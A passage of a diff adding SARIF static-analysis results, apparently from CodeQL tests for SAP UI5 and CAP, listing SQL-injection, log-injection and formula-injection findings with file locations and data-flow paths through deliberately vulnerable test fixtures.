"uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e5ae8639cd6967fb:1", + "primaryLocationStartColumnFingerprint" : "29" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 50, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 44, + "endColumn" : 56 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 19, + "endColumn" : 57 + } + }, + "message" : { + "text" : "SELECT. ... book}`)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 11, + "endColumn" : 57 + } + }, + "message" : { + "text" : "query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "query" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b41554298e90b620:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 58, + "endColumn" : 62 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... book}`)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "967d7be3edc97a9e:1", + "primaryLocationStartColumnFingerprint" : "30" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 57 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 45, + "endColumn" : 57 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 20, + "endColumn" : 58 + } + }, + "message" : { + "text" : "SELECT. ... + book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 11, + "endColumn" : 58 + } + }, + "message" : { + "text" : "query2" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + }, + "message" : { + "text" : "query2" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1c132adaa6986472:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 60, + "endColumn" : 64 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... + book)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "144d55d233768c80:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 59, + "endColumn" : 63 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 17, + "endColumn" : 63 + } + }, + "message" : { + "text" : "CQL`SEL ... + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 11, + "endColumn" : 63 + } + }, + "message" : { + "text" : "cqn" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "cqn" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 56, + "endColumn" : 60 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 32, + "endColumn" : 60 + } + }, + "message" : { + "text" : "`SELECT ... + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 18, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cds.par ... + book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 11, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cqn1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + }, + "message" : { + "text" : "cqn1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "eae426bf8fad0192:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + 